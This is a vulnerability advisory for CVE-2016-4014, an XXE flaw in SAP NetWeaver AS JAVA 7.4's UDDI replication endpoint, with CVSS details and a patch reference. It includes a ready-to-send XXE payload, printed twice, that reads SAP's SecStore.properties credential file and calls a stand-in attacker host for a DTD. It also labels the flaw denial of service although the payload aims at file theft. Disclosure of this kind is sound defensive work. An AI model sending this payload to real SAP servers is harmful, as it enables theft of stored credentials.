Application: SAP AS JAVA **Versions Affected:**SAP AS JAVA 7.4 Vendor URL:SAP **Bugs:**XXE **Reported:**20.10.2015 **Vendor response:**21.10.2015 **Date of Public Advisory:**14.04.2016 **Reference:**SAP Security Note 2254389 Author: Vahagn Vardanyan (ERPScan)
Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-4014
CVSS v3 Base Score: 7.1 / 10
CVSS v3 Base Vector:
AV: Attack Vector (Related exploit range) | Network (N) |
---|---|
AC: Attack Complexity (Required attack complexity) | Low (L) |
PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
UI: User Interaction (Required user participation) | None (N) |
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | High (H) |
VULNERABILITY DESCRIPTION |
An attacker can trigger an XML Entity Expansion or XML External Entity Injection. This causes the entire machine to become unresponsive until the process is terminated manually. An attacker can use this flaw to perform a denial-of-service (DoS) attack.
SAP NetWeaver AS JAVA 7.4
Other versions are probably affected too, but they were not checked.
To correct this vulnerability, install SAP Security Note SAP Security Note 2254389
Java
POST /uddi/api/replication HTTP/1.1 Content-Type: text/xml; charset=utf-8 <!DOCTYPE foo [ <!ENTITY % file SYSTEM “file:///C:/usr/sap/DM0/SYS/global/security/data/SecStore.properties”> <!ENTITY % dtd SYSTEM “http://evil_host/evil_.dtd”> %dtd;]> <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/”> <SOAP-ENV:Header/> <SOAP-ENV:Body> <do_ping> <authInfo/> <findQualifiers> <findQualifier>FINDQUALIFIER</findQualifier> </findQualifiers> <tModelBag> <tModelKey>asd</tModelKey> </tModelBag> </do_ping> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
POST /uddi/api/replication HTTP/1.1
Content-Type: text/xml; charset=utf-8
<!DOCTYPE foo [
<!ENTITY % file SYSTEM “file:///C:/usr/sap/DM0/SYS/global/security/data/SecStore.properties”>
<!ENTITY % dtd SYSTEM “http://evil_host/evil_.dtd”>
%dtd;]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/”>
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<do_ping>
<authInfo/>
<findQualifiers>
<findQualifier>FINDQUALIFIER</findQualifier>
</findQualifiers>
<tModelBag>
<tModelKey>asd</tModelKey>
</tModelBag>
</do_ping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
—|—